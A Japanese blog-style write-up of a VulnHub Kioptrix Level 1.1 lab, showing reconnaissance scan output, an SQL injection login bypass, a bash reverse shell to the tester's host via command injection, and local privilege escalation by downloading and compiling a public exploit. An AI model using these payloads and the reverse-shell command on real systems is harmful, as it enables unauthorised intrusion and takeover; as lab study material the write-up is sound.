【WriteUp】Kioptrix Level1.1
はじめに
またいつぞやのリベンジ
Kioptrixの続編を独力でプレイ
使用ツール
nmap
nikto
dirb
偵察
% nmap -sS -sV -A -T5 -p 1-20000 192.168.3.30
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 11:15 EDT
Nmap scan report for 192.168.3.30
Host is up (0.0012s latency).
Not shown: 9993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 *1
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EF:7A:CC (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds
結果、動作しているサービスは以下
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 *2
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
% dirb http://192.168.3.30
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Mar 28 11:15:48 2020
URL_BASE: http://192.168.3.30/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.3.30/ ----
+ http://192.168.3.30/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.3.30/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.3.30/manual/
+ http://192.168.3.30/usage (CODE:403|SIZE:285)
---- Entering directory: http://192.168.3.30/manual/ ----
==> DIRECTORY: http://192.168.3.30/manual/de/
==> DIRECTORY: http://192.168.3.30/manual/developer/
==> DIRECTORY: http://192.168.3.30/manual/en/
==> DIRECTORY: http://192.168.3.30/manual/faq/
==> DIRECTORY: http://192.168.3.30/manual/fr/
==> DIRECTORY: http://192.168.3.30/manual/howto/
==> DIRECTORY: http://192.168.3.30/manual/images/
+ http://192.168.3.30/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.3.30/manual/ja/
==> DIRECTORY: http://192.168.3.30/manual/ko/
+ http://192.168.3.30/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/misc/
==> DIRECTORY: http://192.168.3.30/manual/mod/
==> DIRECTORY: http://192.168.3.30/manual/programs/
==> DIRECTORY: http://192.168.3.30/manual/ru/
==> DIRECTORY: http://192.168.3.30/manual/ssl/
==> DIRECTORY: http://192.168.3.30/manual/style/
---- Entering directory: http://192.168.3.30/manual/de/ ----
+ http://192.168.3.30/manual/de/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/developer/
+ http://192.168.3.30/manual/de/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/faq/
+ http://192.168.3.30/manual/de/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/howto/
==> DIRECTORY: http://192.168.3.30/manual/de/images/
+ http://192.168.3.30/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.3.30/manual/de/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/de/misc/
==> DIRECTORY: http://192.168.3.30/manual/de/mod/
==> DIRECTORY: http://192.168.3.30/manual/de/programs/
+ http://192.168.3.30/manual/de/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/ssl/
==> DIRECTORY: http://192.168.3.30/manual/de/style/
---- Entering directory: http://192.168.3.30/manual/developer/ ----
+ http://192.168.3.30/manual/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/en/ ----
+ http://192.168.3.30/manual/en/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/developer/
+ http://192.168.3.30/manual/en/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/faq/
+ http://192.168.3.30/manual/en/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/howto/
==> DIRECTORY: http://192.168.3.30/manual/en/images/
+ http://192.168.3.30/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/en/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/en/misc/
==> DIRECTORY: http://192.168.3.30/manual/en/mod/
==> DIRECTORY: http://192.168.3.30/manual/en/programs/
+ http://192.168.3.30/manual/en/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/ssl/
==> DIRECTORY: http://192.168.3.30/manual/en/style/
---- Entering directory: http://192.168.3.30/manual/faq/ ----
+ http://192.168.3.30/manual/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/fr/ ----
+ http://192.168.3.30/manual/fr/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/developer/
+ http://192.168.3.30/manual/fr/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/faq/
+ http://192.168.3.30/manual/fr/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/howto/
==> DIRECTORY: http://192.168.3.30/manual/fr/images/
+ http://192.168.3.30/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/fr/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/fr/misc/
==> DIRECTORY: http://192.168.3.30/manual/fr/mod/
==> DIRECTORY: http://192.168.3.30/manual/fr/programs/
+ http://192.168.3.30/manual/fr/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/ssl/
==> DIRECTORY: http://192.168.3.30/manual/fr/style/
---- Entering directory: http://192.168.3.30/manual/howto/ ----
+ http://192.168.3.30/manual/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ja/ ----
+ http://192.168.3.30/manual/ja/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/developer/
+ http://192.168.3.30/manual/ja/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/faq/
+ http://192.168.3.30/manual/ja/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/howto/
==> DIRECTORY: http://192.168.3.30/manual/ja/images/
+ http://192.168.3.30/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.3.30/manual/ja/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ja/misc/
==> DIRECTORY: http://192.168.3.30/manual/ja/mod/
==> DIRECTORY: http://192.168.3.30/manual/ja/programs/
+ http://192.168.3.30/manual/ja/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ja/style/
---- Entering directory: http://192.168.3.30/manual/ko/ ----
+ http://192.168.3.30/manual/ko/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/developer/
+ http://192.168.3.30/manual/ko/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/faq/
+ http://192.168.3.30/manual/ko/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/howto/
==> DIRECTORY: http://192.168.3.30/manual/ko/images/
+ http://192.168.3.30/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.3.30/manual/ko/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ko/misc/
==> DIRECTORY: http://192.168.3.30/manual/ko/mod/
==> DIRECTORY: http://192.168.3.30/manual/ko/programs/
+ http://192.168.3.30/manual/ko/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ko/style/
---- Entering directory: http://192.168.3.30/manual/misc/ ----
+ http://192.168.3.30/manual/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/mod/ ----
+ http://192.168.3.30/manual/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.3.30/manual/programs/ ----
+ http://192.168.3.30/manual/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/ru/ ----
+ http://192.168.3.30/manual/ru/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/developer/
+ http://192.168.3.30/manual/ru/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/faq/
+ http://192.168.3.30/manual/ru/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/howto/
==> DIRECTORY: http://192.168.3.30/manual/ru/images/
+ http://192.168.3.30/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.3.30/manual/ru/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ru/misc/
==> DIRECTORY: http://192.168.3.30/manual/ru/mod/
==> DIRECTORY: http://192.168.3.30/manual/ru/programs/
+ http://192.168.3.30/manual/ru/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ru/style/
---- Entering directory: http://192.168.3.30/manual/ssl/ ----
+ http://192.168.3.30/manual/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/de/developer/ ----
+ http://192.168.3.30/manual/de/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/de/faq/ ----
+ http://192.168.3.30/manual/de/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/de/howto/ ----
+ http://192.168.3.30/manual/de/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/de/misc/ ----
+ http://192.168.3.30/manual/de/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/de/mod/ ----
+ http://192.168.3.30/manual/de/mod/index.html (CODE:200|SIZE:13561)
---- Entering directory: http://192.168.3.30/manual/de/programs/ ----
+ http://192.168.3.30/manual/de/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/de/ssl/ ----
+ http://192.168.3.30/manual/de/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/en/developer/ ----
+ http://192.168.3.30/manual/en/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/en/faq/ ----
+ http://192.168.3.30/manual/en/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/en/howto/ ----
+ http://192.168.3.30/manual/en/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/en/misc/ ----
+ http://192.168.3.30/manual/en/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/en/mod/ ----
+ http://192.168.3.30/manual/en/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.3.30/manual/en/programs/ ----
+ http://192.168.3.30/manual/en/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/en/ssl/ ----
+ http://192.168.3.30/manual/en/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/fr/developer/ ----
+ http://192.168.3.30/manual/fr/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/fr/faq/ ----
+ http://192.168.3.30/manual/fr/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/fr/howto/ ----
+ http://192.168.3.30/manual/fr/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/fr/misc/ ----
+ http://192.168.3.30/manual/fr/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/fr/mod/ ----
+ http://192.168.3.30/manual/fr/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.3.30/manual/fr/programs/ ----
+ http://192.168.3.30/manual/fr/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/fr/ssl/ ----
+ http://192.168.3.30/manual/fr/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ja/developer/ ----
+ http://192.168.3.30/manual/ja/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/ja/faq/ ----
+ http://192.168.3.30/manual/ja/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/ja/howto/ ----
+ http://192.168.3.30/manual/ja/howto/index.html (CODE:200|SIZE:5607)
---- Entering directory: http://192.168.3.30/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ja/misc/ ----
+ http://192.168.3.30/manual/ja/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/ja/mod/ ----
+ http://192.168.3.30/manual/ja/mod/index.html (CODE:200|SIZE:13298)
---- Entering directory: http://192.168.3.30/manual/ja/programs/ ----
+ http://192.168.3.30/manual/ja/programs/index.html (CODE:200|SIZE:4664)
---- Entering directory: http://192.168.3.30/manual/ja/ssl/ ----
+ http://192.168.3.30/manual/ja/ssl/index.html (CODE:200|SIZE:3957)
---- Entering directory: http://192.168.3.30/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ko/developer/ ----
+ http://192.168.3.30/manual/ko/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/ko/faq/ ----
+ http://192.168.3.30/manual/ko/faq/index.html (CODE:200|SIZE:3371)
---- Entering directory: http://192.168.3.30/manual/ko/howto/ ----
+ http://192.168.3.30/manual/ko/howto/index.html (CODE:200|SIZE:5299)
---- Entering directory: http://192.168.3.30/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ko/misc/ ----
+ http://192.168.3.30/manual/ko/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/ko/mod/ ----
+ http://192.168.3.30/manual/ko/mod/index.html (CODE:200|SIZE:12795)
---- Entering directory: http://192.168.3.30/manual/ko/programs/ ----
+ http://192.168.3.30/manual/ko/programs/index.html (CODE:200|SIZE:4543)
---- Entering directory: http://192.168.3.30/manual/ko/ssl/ ----
+ http://192.168.3.30/manual/ko/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ru/developer/ ----
+ http://192.168.3.30/manual/ru/developer/index.html (CODE:200|SIZE:4770)
---- Entering directory: http://192.168.3.30/manual/ru/faq/ ----
+ http://192.168.3.30/manual/ru/faq/index.html (CODE:200|SIZE:3564)
---- Entering directory: http://192.168.3.30/manual/ru/howto/ ----
+ http://192.168.3.30/manual/ru/howto/index.html (CODE:200|SIZE:5685)
---- Entering directory: http://192.168.3.30/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.30/manual/ru/misc/ ----
+ http://192.168.3.30/manual/ru/misc/index.html (CODE:200|SIZE:5491)
---- Entering directory: http://192.168.3.30/manual/ru/mod/ ----
+ http://192.168.3.30/manual/ru/mod/index.html (CODE:200|SIZE:13437)
---- Entering directory: http://192.168.3.30/manual/ru/programs/ ----
+ http://192.168.3.30/manual/ru/programs/index.html (CODE:200|SIZE:5016)
---- Entering directory: http://192.168.3.30/manual/ru/ssl/ ----
+ http://192.168.3.30/manual/ru/ssl/index.html (CODE:200|SIZE:3988)
---- Entering directory: http://192.168.3.30/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Mar 28 11:33:05 2020
DOWNLOADED: 262884 - FOUND: 102
結果、めぼしいものは特になし
%nikto 192.168.3.30
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.30
+ Target Hostname: 192.168.3.30
+ Target Port: 80
+ Start Time: 2020-03-28 20:56:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2020-03-28 20:58:08 (GMT-4) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
結果、こちらも特にめぼしいものはなし
普通にブラウザで確認すると、ログイン画面らしきものが出てくる
侵入
SSH上での侵入を試みる
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh 192.168.3.30
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
kali@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh admin@192.168.3.30
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
admin@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh root@192.168.3.30
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
root@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$
PW認証が使えるため、ブルートフォースも有効な気がするが、後回し
ブラウザ上での侵入を試みる
いくつかのユーザ名によるログインは不発に終わったので、
SQLインジェクションを試みる
ID: ' OR 1 = 1 --
PW: ' OR 1 = 1 --
結果、認証ページのバイパスに成功
次画面として、WebConsole画面が表示される
pentestmonkyより、revease shellのcheat xheetを参考にして
bashのリバースシェルを試す
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bashはこれ
bash -i >& /dev/tcp/192.168.3.27/8080 0>&1
kali側で、ncをつかって待ち構えておく
% nc -l 192.168.3.27 -p 8080
その後、上記のリバースシェル用bashに ; を追加して実行
ブラウザが読み込み中で止まり、kali側でbashが立ち上がった
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ nc -l -p 8080
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$
権限昇格
権限昇格を狙って探索を行うと、以下のファイルにOSの情報が記載されている
% cat /etc/redhat-release
bash-3.00$ cat redhat-release
CentOS release 4.5 (Final)
記載されたバージョンで権限昇格が可能か、
searchsploitで検索したところ、コードが見つかった
これの上側のexplot code
該当コードがローカルで動作するものなので、
Kaliから簡易サーバーをたてて転送する
% python -m SimpleHTTPServer 8080
サーバ上で/tmpに移動して、
% wget "http://192.168.3.27:8080/9542.c"
送り込んだコードをコンパイルして、実行
gcc -o exploit 9542.c
./exploit
権限取得まで行うことができた
この後
・バックドアの作成
・ほかの人のwriteupを確認して勉強
・使用済みツールを使わない攻略
などなどやりたい
以上